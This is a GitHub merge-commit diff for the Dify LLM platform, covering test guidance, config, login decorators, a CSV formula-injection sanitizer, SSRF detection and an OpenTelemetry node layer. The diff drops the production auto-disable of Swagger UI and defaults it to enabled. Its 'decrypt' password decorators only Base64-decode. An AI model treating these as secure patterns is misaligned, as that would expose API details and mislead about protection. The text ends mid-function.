Merge branch 'main' into p332

crazywoola authored 2025-12-17 10:27:23 +08:00, committed by GitHub as commit 208a81d224 (GPG Key ID B5690EEEBB952194; no known key found for this signature).
202 changed files with 22230 additions and 1494 deletions

View File

@ -76,7 +76,7 @@ Use this checklist when generating or reviewing tests for Dify frontend componen
- [ ] **DO NOT mock base components** (`@/app/components/base/*`)
- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`)
- [ ] Shared mock state reset in `beforeEach`
- [ ] i18n mock returns keys (not empty strings)
- [ ] i18n uses shared mock (auto-loaded); only override locally for custom translations
- [ ] Router mocks match actual Next.js API
- [ ] Mocks reflect actual component conditional behavior
- [ ] Only mock: API services, complex context providers, third-party libs

View File

@ -318,3 +318,4 @@ For more detailed information, refer to:
- `web/jest.config.ts` - Jest configuration
- `web/jest.setup.ts` - Test environment setup
- `web/testing/analyze-component.js` - Component analysis tool
- `web/__mocks__/react-i18next.ts` - Shared i18n mock (auto-loaded by Jest, no explicit mock needed; override locally only for custom translations)

View File

@ -46,12 +46,22 @@ Only mock these categories:
## Essential Mocks
### 1. i18n (Always Required)
### 1. i18n (Auto-loaded via Shared Mock)
A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest.
**No explicit mock needed** for most tests - it returns translation keys as-is.
For tests requiring custom translations, override the mock:
```typescript
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
t: (key: string) => {
const translations: Record<string, string> = {
'my.custom.key': 'Custom translation',
}
return translations[key] || key
},
}),
}))
```
@ -313,7 +323,7 @@ Need to use a component in test?
│ └─ YES → Mock it (next/navigation, external SDKs)
└─ Is it i18n?
└─ YES → Mock to return keys
└─ YES → Uses shared mock (auto-loaded). Override only for custom translations
```
## Factory Function Pattern

View File

@ -26,13 +26,20 @@ import userEvent from '@testing-library/user-event'
// WHY: Mocks must be hoisted to top of file (Jest requirement).
// They run BEFORE imports, so keep them before component imports.
// i18n (always required in Dify)
// WHY: Returns key instead of translation so tests don't depend on i18n files
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
// i18n (automatically mocked)
// WHY: Shared mock at web/__mocks__/react-i18next.ts is auto-loaded by Jest
// No explicit mock needed - it returns translation keys as-is
// Override only if custom translations are required:
// jest.mock('react-i18next', () => ({
// useTranslation: () => ({
// t: (key: string) => {
// const customTranslations: Record<string, string> = {
// 'my.custom.key': 'Custom Translation',
// }
// return customTranslations[key] || key
// },
// }),
// }))
// Router (if component uses useRouter, usePathname, useSearchParams)
// WHY: Isolates tests from Next.js routing, enables testing navigation behavior

View File

@ -93,4 +93,12 @@ jobs:
# Create a detailed coverage summary
echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY
echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY
uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY
{
echo ""
echo "<details><summary>File-level coverage (click to expand)</summary>"
echo ""
echo '```'
uv run --project api coverage report -m
echo '```'
echo "</details>"
} >> $GITHUB_STEP_SUMMARY

View File

@ -627,17 +627,7 @@ QUEUE_MONITOR_ALERT_EMAILS=
QUEUE_MONITOR_INTERVAL=30
# Swagger UI configuration
# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION)
# to prevent API information disclosure.
#
# Behavior:
# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default)
# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED
# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check)
# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable)
#
# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT
# SWAGGER_UI_ENABLED=false
SWAGGER_UI_ENABLED=true
SWAGGER_UI_PATH=/swagger-ui.html
# Whether to encrypt dataset IDs when exporting DSL files (default: true)
@ -681,4 +671,4 @@ ANNOTATION_IMPORT_MIN_RECORDS=1
ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5
ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
# Maximum number of concurrent annotation import tasks per tenant
ANNOTATION_IMPORT_MAX_CONCURRENT=5

View File

@ -1263,19 +1263,9 @@ class WorkflowLogConfig(BaseSettings):
class SwaggerUIConfig(BaseSettings):
"""
Configuration for Swagger UI documentation.
Security Note: Swagger UI is automatically disabled in PRODUCTION environment
to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly
to enable in production if needed.
"""
SWAGGER_UI_ENABLED: bool | None = Field(
description="Whether to enable Swagger UI in api module. "
"Automatically disabled in PRODUCTION environment for security. "
"Set to true explicitly to enable in production.",
default=None,
SWAGGER_UI_ENABLED: bool = Field(
description="Whether to enable Swagger UI in api module",
default=True,
)
SWAGGER_UI_PATH: str = Field(
@ -1283,23 +1273,6 @@ class SwaggerUIConfig(BaseSettings):
default="/swagger-ui.html",
)
@property
def swagger_ui_enabled(self) -> bool:
"""
Compute whether Swagger UI should be enabled.
If SWAGGER_UI_ENABLED is explicitly set, use that value.
Otherwise, disable in PRODUCTION environment for security.
"""
if self.SWAGGER_UI_ENABLED is not None:
return self.SWAGGER_UI_ENABLED
# Auto-disable in production environment
import os
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
return deploy_env.upper() != "PRODUCTION"
class TenantIsolatedTaskQueueConfig(BaseSettings):
TENANT_ISOLATED_TASK_CONCURRENCY: int = Field(

View File

@ -107,7 +107,7 @@ class KeywordStoreConfig(BaseSettings):
class DatabaseConfig(BaseSettings):
# Database type selector
DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field(
DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field(
description="Database type to use. OceanBase is MySQL-compatible.",
default="postgresql",
)

View File

@ -1,6 +1,6 @@
from typing import Any, Literal
from flask import abort, request
from flask import abort, make_response, request
from flask_restx import Resource, fields, marshal, marshal_with
from pydantic import BaseModel, Field, field_validator
@ -259,7 +259,7 @@ class AnnotationApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/annotations/export")
class AnnotationExportApi(Resource):
@console_ns.doc("export_annotations")
@console_ns.doc(description="Export all annotations for an app")
@console_ns.doc(description="Export all annotations for an app with CSV injection protection")
@console_ns.doc(params={"app_id": "Application ID"})
@console_ns.response(
200,
@ -274,8 +274,14 @@ class AnnotationExportApi(Resource):
def get(self, app_id):
app_id = str(app_id)
annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id)
response = {"data": marshal(annotation_list, annotation_fields)}
return response, 200
response_data = {"data": marshal(annotation_list, annotation_fields)}
# Create response with secure headers for CSV export
response = make_response(response_data, 200)
response.headers["Content-Type"] = "application/json; charset=utf-8"
response.headers["X-Content-Type-Options"] = "nosniff"
return response
@console_ns.route("/apps/<uuid:app_id>/annotations/<uuid:annotation_id>")

View File

@ -22,7 +22,12 @@ from controllers.console.error import (
NotAllowedCreateWorkspace,
WorkspacesLimitExceeded,
)
from controllers.console.wraps import email_password_login_enabled, setup_required
from controllers.console.wraps import (
decrypt_code_field,
decrypt_password_field,
email_password_login_enabled,
setup_required,
)
from events.tenant_event import tenant_was_created
from libs.helper import EmailStr, extract_remote_ip
from libs.login import current_account_with_tenant
@ -79,6 +84,7 @@ class LoginApi(Resource):
@setup_required
@email_password_login_enabled
@console_ns.expect(console_ns.models[LoginPayload.__name__])
@decrypt_password_field
def post(self):
"""Authenticate user and login."""
args = LoginPayload.model_validate(console_ns.payload)
@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource):
class EmailCodeLoginApi(Resource):
@setup_required
@console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__])
@decrypt_code_field
def post(self):
args = EmailCodeLoginPayload.model_validate(console_ns.payload)

View File

@ -218,14 +218,14 @@ class DataSourceNotionListApi(Resource):
@console_ns.route(
"/notion/workspaces/<uuid:workspace_id>/pages/<uuid:page_id>/<string:page_type>/preview",
"/notion/pages/<uuid:page_id>/<string:page_type>/preview",
"/datasets/notion-indexing-estimate",
)
class DataSourceNotionApi(Resource):
@setup_required
@login_required
@account_initialization_required
def get(self, workspace_id, page_id, page_type):
def get(self, page_id, page_type):
_, current_tenant_id = current_account_with_tenant()
credential_id = request.args.get("credential_id", default=None, type=str)
@ -239,11 +239,10 @@ class DataSourceNotionApi(Resource):
plugin_id="langgenius/notion_datasource",
)
workspace_id = str(workspace_id)
page_id = str(page_id)
extractor = NotionExtractor(
notion_workspace_id=workspace_id,
notion_workspace_id="",
notion_obj_id=page_id,
notion_page_type=page_type,
notion_access_token=credential.get("integration_secret"),

View File

@ -223,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool
VectorType.COUCHBASE,
VectorType.OPENGAUSS,
VectorType.OCEANBASE,
VectorType.SEEKDB,
VectorType.TABLESTORE,
VectorType.HUAWEI_CLOUD,
VectorType.TENCENT,

View File

@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar
from flask import abort, request
from configs import dify_config
from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError
from controllers.console.workspace.error import AccountNotInitializedError
from enums.cloud_plan import CloudPlan
from extensions.ext_database import db
from extensions.ext_redis import redis_client
from libs.encryption import FieldEncryption
from libs.login import current_account_with_tenant
from models.account import AccountStatus
from models.dataset import RateLimitLog
@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo
P = ParamSpec("P")
R = TypeVar("R")
# Field names for decryption
FIELD_NAME_PASSWORD = "password"
FIELD_NAME_CODE = "code"
# Error messages for decryption failures
ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data"
ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code"
def account_initialization_required(view: Callable[P, R]):
@wraps(view)
@ -419,3 +429,75 @@ def annotation_import_concurrency_limit(view: Callable[P, R]):
return view(*args, **kwargs)
return decorated
def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None:
"""
Helper to decode a Base64 encoded field in the request payload.
Args:
field_name: Name of the field to decode
error_class: Exception class to raise on decoding failure
error_message: Error message to include in the exception
"""
if not request or not request.is_json:
return
# Get the payload dict - it's cached and mutable
payload = request.get_json()
if not payload or field_name not in payload:
return
encoded_value = payload[field_name]
decoded_value = FieldEncryption.decrypt_field(encoded_value)
# If decoding failed, raise error immediately
if decoded_value is None:
raise error_class(error_message)
# Update payload dict in-place with decoded value
# Since payload is a mutable dict and get_json() returns the cached reference,
# modifying it will affect all subsequent accesses including console_ns.payload
payload[field_name] = decoded_value
def decrypt_password_field(view: Callable[P, R]):
"""
Decorator to decrypt password field in request payload.
Automatically decrypts the 'password' field if encryption is enabled.
If decryption fails, raises AuthenticationFailedError.
Usage:
@decrypt_password_field
def post(self):
args = LoginPayload.model_validate(console_ns.payload)
# args.password is now decrypted
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA)
return view(*args, **kwargs)
return decorated
def decrypt_code_field(view: Callable[P, R]):
"""
Decorator to decrypt verification code field in request payload.
Automatically decrypts the 'code' field if encryption is enabled.
If decryption fails, raises EmailCodeError.
Usage:
@decrypt_code_field
def post(self):
args = EmailCodeLoginPayload.model_validate(console_ns.payload)
# args.code is now decrypted
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE)
return view(*args, **kwargs)
return decorated
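
The same helper generalizes to other Base64-encoded fields. A hypothetical sketch (decorator name, field name, and error message below are not part of the diff) of an additional decorator that would live in this module, reusing its existing imports (`functools.wraps`, the `P`/`R` type parameters, `AuthenticationFailedError`) and the `_decrypt_field` helper defined above:

```python
# Hypothetical extension of controllers/console/wraps.py; nothing below is in the diff.
FIELD_NAME_TOKEN = "token"
ERROR_MSG_INVALID_ENCRYPTED_TOKEN = "Invalid encrypted token"


def decrypt_token_field(view: Callable[P, R]):
    """Hypothetical decorator that decodes a Base64 'token' field, mirroring the two above."""

    @wraps(view)
    def decorated(*args: P.args, **kwargs: P.kwargs):
        # Decode the field in place; raise the chosen error if decoding fails.
        _decrypt_field(FIELD_NAME_TOKEN, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_TOKEN)
        return view(*args, **kwargs)

    return decorated
```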

View File

@ -0,0 +1,89 @@
"""CSV sanitization utilities to prevent formula injection attacks."""
from typing import Any
class CSVSanitizer:
"""
Sanitizer for CSV export to prevent formula injection attacks.
This class provides methods to sanitize data before CSV export by escaping
characters that could be interpreted as formulas by spreadsheet applications
(Excel, LibreOffice, Google Sheets).
Formula injection occurs when user-controlled data starting with special
characters (=, +, -, @, tab, carriage return) is exported to CSV and opened
in a spreadsheet application, potentially executing malicious commands.
"""
# Characters that can start a formula in Excel/LibreOffice/Google Sheets
FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"})
@classmethod
def sanitize_value(cls, value: Any) -> str:
"""
Sanitize a value for safe CSV export.
Prefixes formula-initiating characters with a single quote to prevent
Excel/LibreOffice/Google Sheets from treating them as formulas.
Args:
value: The value to sanitize (will be converted to string)
Returns:
Sanitized string safe for CSV export
Examples:
>>> CSVSanitizer.sanitize_value("=1+1")
"'=1+1"
>>> CSVSanitizer.sanitize_value("Hello World")
"Hello World"
>>> CSVSanitizer.sanitize_value(None)
""
"""
if value is None:
return ""
# Convert to string
str_value = str(value)
# If empty, return as is
if not str_value:
return ""
# Check if first character is a formula initiator
if str_value[0] in cls.FORMULA_CHARS:
# Prefix with single quote to escape
return f"'{str_value}"
return str_value
@classmethod
def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]:
"""
Sanitize specified fields in a dictionary.
Args:
data: Dictionary containing data to sanitize
fields_to_sanitize: List of field names to sanitize.
If None, sanitizes all string fields.
Returns:
Dictionary with sanitized values (creates a shallow copy)
Examples:
>>> data = {"question": "=1+1", "answer": "+calc", "id": "123"}
>>> CSVSanitizer.sanitize_dict(data, ["question", "answer"])
{"question": "'=1+1", "answer": "'+calc", "id": "123"}
"""
sanitized = data.copy()
if fields_to_sanitize is None:
# Sanitize all string fields
fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)]
for field in fields_to_sanitize:
if field in sanitized:
sanitized[field] = cls.sanitize_value(sanitized[field])
return sanitized
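
A hedged usage sketch of the class above; the import path matches the one used by `services/annotation_service.py` later in this diff, and the sample rows are illustrative:

```python
# Sanitize user-controlled cells before handing rows to a CSV writer.
import csv
import io

from core.helper.csv_sanitizer import CSVSanitizer

rows = [
    {"question": '=HYPERLINK("http://evil","click")', "answer": "+2+5", "id": "a1"},
    {"question": "What is Dify?", "answer": "An LLM app platform", "id": "a2"},
]

buffer = io.StringIO()
writer = csv.DictWriter(buffer, fieldnames=["question", "answer", "id"])
writer.writeheader()
for row in rows:
    # Only the user-controlled fields are escaped; "id" is left untouched.
    writer.writerow(CSVSanitizer.sanitize_dict(row, ["question", "answer"]))

print(buffer.getvalue())
# '=HYPERLINK(...)' becomes "'=HYPERLINK(...)", so spreadsheets render it as text, not a formula.
```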

View File

@ -9,6 +9,7 @@ import httpx
from configs import dify_config
from core.helper.http_client_pooling import get_pooled_http_client
from core.tools.errors import ToolSSRFError
logger = logging.getLogger(__name__)
@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs):
while retries <= max_retries:
try:
response = client.request(method=method, url=url, **kwargs)
# Check for SSRF protection by Squid proxy
if response.status_code in (401, 403):
# Check if this is a Squid SSRF rejection
server_header = response.headers.get("server", "").lower()
via_header = response.headers.get("via", "").lower()
# Squid typically identifies itself in Server or Via headers
if "squid" in server_header or "squid" in via_header:
raise ToolSSRFError(
f"Access to '{url}' was blocked by SSRF protection. "
f"The URL may point to a private or local network address. "
)
if response.status_code not in STATUS_FORCELIST:
return response
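
Callers that previously only saw HTTP status codes can now distinguish a Squid SSRF rejection from an ordinary failure. A minimal sketch, assuming this hunk is the `core.helper.ssrf_proxy` module imported elsewhere in this diff and using only the names visible above:

```python
from core.helper.ssrf_proxy import make_request  # assumed module path for this hunk
from core.tools.errors import ToolSSRFError


def fetch_preview(url: str) -> str:
    try:
        response = make_request("GET", url, timeout=5)
    except ToolSSRFError as exc:
        # Raised when a 401/403 carries a Squid Server/Via header, i.e. the proxy
        # blocked a private or local network address.
        return f"Blocked by SSRF protection: {exc}"
    return response.text[:200]
```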

View File

@ -163,7 +163,7 @@ class Vector:
from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory
return LindormVectorStoreFactory
case VectorType.OCEANBASE:
case VectorType.OCEANBASE | VectorType.SEEKDB:
from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory
return OceanBaseVectorFactory

View File

@ -27,6 +27,7 @@ class VectorType(StrEnum):
UPSTASH = "upstash"
TIDB_ON_QDRANT = "tidb_on_qdrant"
OCEANBASE = "oceanbase"
SEEKDB = "seekdb"
OPENGAUSS = "opengauss"
TABLESTORE = "tablestore"
HUAWEI_CLOUD = "huawei_cloud"

View File

@ -10,7 +10,7 @@ class NotionInfo(BaseModel):
"""
credential_id: str | None = None
notion_workspace_id: str
notion_workspace_id: str | None = ""
notion_obj_id: str
notion_page_type: str
document: Document | None = None

View File

@ -166,7 +166,7 @@ class ExtractProcessor:
elif extract_setting.datasource_type == DatasourceType.NOTION:
assert extract_setting.notion_info is not None, "notion_info is required"
extractor = NotionExtractor(
notion_workspace_id=extract_setting.notion_info.notion_workspace_id,
notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "",
notion_obj_id=extract_setting.notion_info.notion_obj_id,
notion_page_type=extract_setting.notion_info.notion_page_type,
document_model=extract_setting.notion_info.document,

View File

@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum):
notion_import = "notion"
local_file = "file_upload"
online_document = "online_document"
online_drive = "online_drive"

View File

@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError):
pass
class ToolSSRFError(ValueError):
pass
class ToolCredentialPolicyViolationError(ValueError):
pass

View File

@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser:
except ToolApiSchemaError as e:
openapi_error = e
# openai parse error, fallback to swagger
# openapi parse error, fallback to swagger
try:
converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi(
loaded_content, extra_info=extra_info, warning=warning
@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser:
), schema_type
except ToolApiSchemaError as e:
swagger_error = e
# swagger parse error, fallback to openai plugin
try:
openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle(

View File

@ -140,6 +140,10 @@ class GraphEngine:
pause_handler = PauseCommandHandler()
self._command_processor.register_handler(PauseCommand, pause_handler)
# === Extensibility ===
# Layers allow plugins to extend engine functionality
self._layers: list[GraphEngineLayer] = []
# === Worker Pool Setup ===
# Capture Flask app context for worker threads
flask_app: Flask | None = None
@ -158,6 +162,7 @@ class GraphEngine:
ready_queue=self._ready_queue,
event_queue=self._event_queue,
graph=self._graph,
layers=self._layers,
flask_app=flask_app,
context_vars=context_vars,
min_workers=self._min_workers,
@ -196,10 +201,6 @@ class GraphEngine:
event_emitter=self._event_manager,
)
# === Extensibility ===
# Layers allow plugins to extend engine functionality
self._layers: list[GraphEngineLayer] = []
# === Validation ===
# Ensure all nodes share the same GraphRuntimeState instance
self._validate_graph_state_consistency()

View File

@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut
from .base import GraphEngineLayer
from .debug_logging import DebugLoggingLayer
from .execution_limits import ExecutionLimitsLayer
from .observability import ObservabilityLayer
__all__ = [
"DebugLoggingLayer",
"ExecutionLimitsLayer",
"GraphEngineLayer",
"ObservabilityLayer",
]

View File

@ -9,6 +9,7 @@ from abc import ABC, abstractmethod
from core.workflow.graph_engine.protocols.command_channel import CommandChannel
from core.workflow.graph_events import GraphEngineEvent
from core.workflow.nodes.base.node import Node
from core.workflow.runtime import ReadOnlyGraphRuntimeState
@ -83,3 +84,29 @@ class GraphEngineLayer(ABC):
error: The exception that caused execution to fail, or None if successful
"""
pass
def on_node_run_start(self, node: Node) -> None: # noqa: B027
"""
Called immediately before a node begins execution.
Layers can override to inject behavior (e.g., start spans) prior to node execution.
The node's execution ID is available via `node._node_execution_id` and will be
consistent with all events emitted by this node execution.
Args:
node: The node instance about to be executed
"""
pass
def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027
"""
Called after a node finishes execution.
The node's execution ID is available via `node._node_execution_id` and matches
the `id` field in all events emitted by this node execution.
Args:
node: The node instance that just finished execution
error: Exception instance if the node failed, otherwise None
"""
pass
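
These two hooks give layers a per-node extension point. A minimal sketch of a custom layer using them, assuming the base class and import paths shown above and that the graph-level hooks also need concrete implementations; `NodeTimingLayer` is hypothetical, not part of the diff:

```python
import logging
import time

from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.graph_events import GraphEngineEvent
from core.workflow.nodes.base.node import Node

logger = logging.getLogger(__name__)


class NodeTimingLayer(GraphEngineLayer):
    """Hypothetical layer that logs wall-clock duration per node execution."""

    def __init__(self) -> None:
        super().__init__()
        self._started: dict[str, float] = {}

    def on_graph_start(self) -> None:
        self._started.clear()

    def on_event(self, event: GraphEngineEvent) -> None:
        pass  # not needed for timing

    def on_graph_end(self, error: Exception | None) -> None:
        self._started.clear()

    def on_node_run_start(self, node: Node) -> None:
        # execution_id is already assigned by the worker before this hook fires.
        self._started[node.execution_id] = time.monotonic()

    def on_node_run_end(self, node: Node, error: Exception | None) -> None:
        started = self._started.pop(node.execution_id, None)
        if started is not None:
            logger.info("node %s took %.3fs (error=%r)", node.id, time.monotonic() - started, error)
```

Such a layer would be attached like the others in this diff, e.g. `self.graph_engine.layer(NodeTimingLayer())` alongside the `ObservabilityLayer` registration in `WorkflowEntry`.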

View File

@ -0,0 +1,61 @@
"""
Node-level OpenTelemetry parser interfaces and defaults.
"""
import json
from typing import Protocol
from opentelemetry.trace import Span
from opentelemetry.trace.status import Status, StatusCode
from core.workflow.nodes.base.node import Node
from core.workflow.nodes.tool.entities import ToolNodeData
class NodeOTelParser(Protocol):
"""Parser interface for node-specific OpenTelemetry enrichment."""
def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ...
class DefaultNodeOTelParser:
"""Fallback parser used when no node-specific parser is registered."""
def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None:
span.set_attribute("node.id", node.id)
if node.execution_id:
span.set_attribute("node.execution_id", node.execution_id)
if hasattr(node, "node_type") and node.node_type:
span.set_attribute("node.type", node.node_type.value)
if error:
span.record_exception(error)
span.set_status(Status(StatusCode.ERROR, str(error)))
else:
span.set_status(Status(StatusCode.OK))
class ToolNodeOTelParser:
"""Parser for tool nodes that captures tool-specific metadata."""
def __init__(self) -> None:
self._delegate = DefaultNodeOTelParser()
def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None:
self._delegate.parse(node=node, span=span, error=error)
tool_data = getattr(node, "_node_data", None)
if not isinstance(tool_data, ToolNodeData):
return
span.set_attribute("tool.provider.id", tool_data.provider_id)
span.set_attribute("tool.provider.type", tool_data.provider_type.value)
span.set_attribute("tool.provider.name", tool_data.provider_name)
span.set_attribute("tool.name", tool_data.tool_name)
span.set_attribute("tool.label", tool_data.tool_label)
if tool_data.plugin_unique_identifier:
span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier)
if tool_data.credential_id:
span.set_attribute("tool.credential.id", tool_data.credential_id)
if tool_data.tool_configurations:
span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False))

View File

@ -0,0 +1,169 @@
"""
Observability layer for GraphEngine.
This layer creates OpenTelemetry spans for node execution, enabling distributed
tracing of workflow execution. It establishes OTel context during node execution
so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically
associates with the node span.
"""
import logging
from dataclasses import dataclass
from typing import cast, final
from opentelemetry import context as context_api
from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context
from typing_extensions import override
from configs import dify_config
from core.workflow.enums import NodeType
from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.graph_engine.layers.node_parsers import (
DefaultNodeOTelParser,
NodeOTelParser,
ToolNodeOTelParser,
)
from core.workflow.nodes.base.node import Node
from extensions.otel.runtime import is_instrument_flag_enabled
logger = logging.getLogger(__name__)
@dataclass(slots=True)
class _NodeSpanContext:
span: "Span"
token: object
@final
class ObservabilityLayer(GraphEngineLayer):
"""
Layer that creates OpenTelemetry spans for node execution.
This layer:
- Creates a span when a node starts execution
- Establishes OTel context so automatic instrumentation associates with the span
- Sets complete attributes and status when node execution ends
"""
def __init__(self) -> None:
super().__init__()
self._node_contexts: dict[str, _NodeSpanContext] = {}
self._parsers: dict[NodeType, NodeOTelParser] = {}
self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser())
self._is_disabled: bool = False
self._tracer: Tracer | None = None
self._build_parser_registry()
self._init_tracer()
def _init_tracer(self) -> None:
"""Initialize OpenTelemetry tracer in constructor."""
if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()):
self._is_disabled = True
return
try:
self._tracer = get_tracer(__name__)
except Exception as e:
logger.warning("Failed to get OpenTelemetry tracer: %s", e)
self._is_disabled = True
def _build_parser_registry(self) -> None:
"""Initialize parser registry for node types."""
self._parsers = {
NodeType.TOOL: ToolNodeOTelParser(),
}
def _get_parser(self, node: Node) -> NodeOTelParser:
node_type = getattr(node, "node_type", None)
if isinstance(node_type, NodeType):
return self._parsers.get(node_type, self._default_parser)
return self._default_parser
@override
def on_graph_start(self) -> None:
"""Called when graph execution starts."""
self._node_contexts.clear()
@override
def on_node_run_start(self, node: Node) -> None:
"""
Called when a node starts execution.
Creates a span and establishes OTel context for automatic instrumentation.
"""
if self._is_disabled:
return
try:
if not self._tracer:
return
execution_id = node.execution_id
if not execution_id:
return
parent_context = context_api.get_current()
span = self._tracer.start_span(
f"{node.title}",
kind=SpanKind.INTERNAL,
context=parent_context,
)
new_context = set_span_in_context(span)
token = context_api.attach(new_context)
self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token)
except Exception as e:
logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e)
@override
def on_node_run_end(self, node: Node, error: Exception | None) -> None:
"""
Called when a node finishes execution.
Sets complete attributes, records exceptions, and ends the span.
"""
if self._is_disabled:
return
try:
execution_id = node.execution_id
if not execution_id:
return
node_context = self._node_contexts.get(execution_id)
if not node_context:
return
span = node_context.span
parser = self._get_parser(node)
try:
parser.parse(node=node, span=span, error=error)
span.end()
finally:
token = node_context.token
if token is not None:
try:
context_api.detach(token)
except Exception:
logger.warning("Failed to detach OpenTelemetry token: %s", token)
self._node_contexts.pop(execution_id, None)
except Exception as e:
logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e)
@override
def on_event(self, event) -> None:
"""Not used in this layer."""
pass
@override
def on_graph_end(self, error: Exception | None) -> None:
"""Called when graph execution ends."""
if self._node_contexts:
logger.warning(
"ObservabilityLayer: %d node spans were not properly ended",
len(self._node_contexts),
)
self._node_contexts.clear()

View File

@ -9,6 +9,7 @@ import contextvars
import queue
import threading
import time
from collections.abc import Sequence
from datetime import datetime
from typing import final
from uuid import uuid4
@ -17,6 +18,7 @@ from flask import Flask
from typing_extensions import override
from core.workflow.graph import Graph
from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent
from core.workflow.nodes.base.node import Node
from libs.flask_utils import preserve_flask_contexts
@ -39,6 +41,7 @@ class Worker(threading.Thread):
ready_queue: ReadyQueue,
event_queue: queue.Queue[GraphNodeEventBase],
graph: Graph,
layers: Sequence[GraphEngineLayer],
worker_id: int = 0,
flask_app: Flask | None = None,
context_vars: contextvars.Context | None = None,
@ -50,6 +53,7 @@ class Worker(threading.Thread):
ready_queue: Ready queue containing node IDs ready for execution
event_queue: Queue for pushing execution events
graph: Graph containing nodes to execute
layers: Graph engine layers for node execution hooks
worker_id: Unique identifier for this worker
flask_app: Optional Flask application for context preservation
context_vars: Optional context variables to preserve in worker thread
@ -63,6 +67,7 @@ class Worker(threading.Thread):
self._context_vars = context_vars
self._stop_event = threading.Event()
self._last_task_time = time.time()
self._layers = layers if layers is not None else []
def stop(self) -> None:
"""Signal the worker to stop processing."""
@ -122,20 +127,51 @@ class Worker(threading.Thread):
Args:
node: The node instance to execute
"""
# Execute the node with preserved context if Flask app is provided
node.ensure_execution_id()
error: Exception | None = None
if self._flask_app and self._context_vars:
with preserve_flask_contexts(
flask_app=self._flask_app,
context_vars=self._context_vars,
):
# Execute the node
self._invoke_node_run_start_hooks(node)
try:
node_events = node.run()
for event in node_events:
self._event_queue.put(event)
except Exception as exc:
error = exc
raise
finally:
self._invoke_node_run_end_hooks(node, error)
else:
self._invoke_node_run_start_hooks(node)
try:
node_events = node.run()
for event in node_events:
# Forward event to dispatcher immediately for streaming
self._event_queue.put(event)
else:
# Execute without context preservation
node_events = node.run()
for event in node_events:
# Forward event to dispatcher immediately for streaming
self._event_queue.put(event)
except Exception as exc:
error = exc
raise
finally:
self._invoke_node_run_end_hooks(node, error)
def _invoke_node_run_start_hooks(self, node: Node) -> None:
"""Invoke on_node_run_start hooks for all layers."""
for layer in self._layers:
try:
layer.on_node_run_start(node)
except Exception:
